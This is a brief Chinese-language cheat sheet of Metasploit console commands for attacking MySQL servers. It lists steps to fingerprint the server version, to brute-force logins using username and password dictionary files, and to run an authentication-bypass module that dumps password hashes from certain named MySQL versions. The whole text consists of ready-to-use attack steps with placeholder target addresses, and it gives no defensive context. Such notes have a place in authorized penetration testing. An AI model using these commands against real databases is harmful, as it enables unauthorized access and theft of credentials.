msf-mysql

测试数据库版本

1、use auxiliary/scanner/mysql/mysql_version

2、set rhost x.x.x.x

3、run 或者 exploit

暴力破解密码

1、use auxiliary/scanner/mysql/mysql_login

2、set rhosts x.x.x.x

3、set user_file /home/user.txt （用户名字典）

4、set pass_file /home/pass.txt （密码字典）

5、run 或者 exploit

绕过密码

部分 Mysql 版本为5.1.61, 5.2.11, 5.3.5, 5.5.22的数据库存在的漏洞

1、use auxiliary/scanner/mysql/mysql_authbypass_hashdump

2、set rhosts x.x.x.x

3、run 或者 exploit